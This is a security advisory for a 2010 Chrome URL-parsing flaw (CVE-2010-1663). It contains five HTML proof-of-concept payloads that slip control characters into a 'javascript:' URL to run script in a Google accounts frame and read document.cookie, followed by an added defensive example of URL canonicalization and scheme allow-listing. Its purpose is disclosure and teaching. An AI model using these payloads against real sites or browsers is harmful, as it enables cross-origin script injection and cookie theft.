Google Chrome 4.1.249.1059 Cross Origin Bypass

Published: 2010-05-20
Author: Jordi Chancel
Source: packetstormsecurity.com (PACKETSTORM:89715)

EPSS: 0.549 (percentile 97.7%)

```
# Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
# Author: Jordi Chancel
#
# Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
#
# Description: {
# The Google URL Parsing Library (aka google-url or GURL) in Google Chrome
# before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy
# via CHARACTER TABULATION or other escape characters inside a javascript: protocol string. }
#
# Some PoCs:

<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>

Greetz : Xylitol , Eddy Bordi , 599eme Man , Gnouf , CTZ .
```
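The root cause shown by the PoCs above is a mismatch between how a string is checked and how the browser's URL parser later interprets it: a tab, line feed or carriage return inside the scheme defeats a plain prefix comparison, yet the parser discards those characters and still sees `javascript:`. The following is an added example, not part of the advisory and not Chrome or GURL code, showing how a web application's link sanitizer should canonicalize a URL before classifying its scheme. The `canonicalScheme` and `isSafeLink` helpers are my own; the stripping rules follow the WHATWG URL parser (trim leading and trailing C0 controls and space, remove all ASCII tab and newline characters), and `browserProtocol` cross-checks the result against Node's built-in `URL` class. The sample inputs are constructed to mirror the five variants in the advisory.

```javascript
// Added example (not from the advisory): canonicalize before checking the scheme.

// Constructed samples mirroring the advisory's five variants of the payload.
const SAMPLES = [
  'javascr\u0009ipt:alert(document.cookie)', // tab written as \u0009
  'javascr\x09ipt:alert(document.cookie)',   // tab written as \x09
  'javascr\nipt:alert(document.cookie)',     // line feed
  'javascr\ript:alert(document.cookie)',     // carriage return
  'javascr\tipt:alert(document.cookie)',     // tab written as \t
];

// The weak check: a prefix comparison on the raw string.
// Every sample above slips past it because of the embedded control character.
function naiveIsJavascriptUrl(s) {
  return s.toLowerCase().startsWith('javascript:');
}

// Canonical scheme extraction, following the first steps of the WHATWG URL
// parser: strip leading/trailing C0 controls and space, remove every ASCII
// tab, LF and CR anywhere in the input, then read the scheme (one ASCII letter
// followed by letters, digits, '+', '-' or '.') up to the first ':'.
// Returns the lowercased scheme, or null when the input has no scheme
// (a relative reference that resolves against the page's own origin).
function canonicalScheme(input) {
  let s = String(input).replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  s = s.replace(/[\t\n\r]/g, '');
  const m = /^([A-Za-z][A-Za-z0-9+\-.]*):/.exec(s);
  return m ? m[1].toLowerCase() : null;
}

function isJavascriptUrl(s) {
  return canonicalScheme(s) === 'javascript';
}

// What a sanitizer should do instead of a deny-list: allow only known schemes
// (assumed policy for this example) and treat scheme-less input as relative.
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);
function isSafeLink(s) {
  const scheme = canonicalScheme(s);
  if (scheme === null) return true; // relative URL: same origin as the page
  return SAFE_SCHEMES.has(scheme);
}

// Cross-check: Node's WHATWG URL implementation applies the same stripping,
// so it reports 'javascript:' for every sample. Returns null if unparsable.
function browserProtocol(s) {
  try {
    return new URL(s).protocol;
  } catch (e) {
    return null;
  }
}

// Stand-alone demonstration.
for (const s of SAMPLES) {
  console.log(JSON.stringify(s),
    'naive:', naiveIsJavascriptUrl(s),
    'canonical:', isJavascriptUrl(s),
    'URL.protocol:', browserProtocol(s),
    'safe:', isSafeLink(s));
}
```

The point to take from the output is that `naiveIsJavascriptUrl` returns `false` for all five samples while `isJavascriptUrl` and `URL.protocol` both identify them as `javascript:`; any check that runs before the browser's parser has to normalize the same way the parser does, and an allow-list of schemes is far easier to keep correct than a deny-list of spellings.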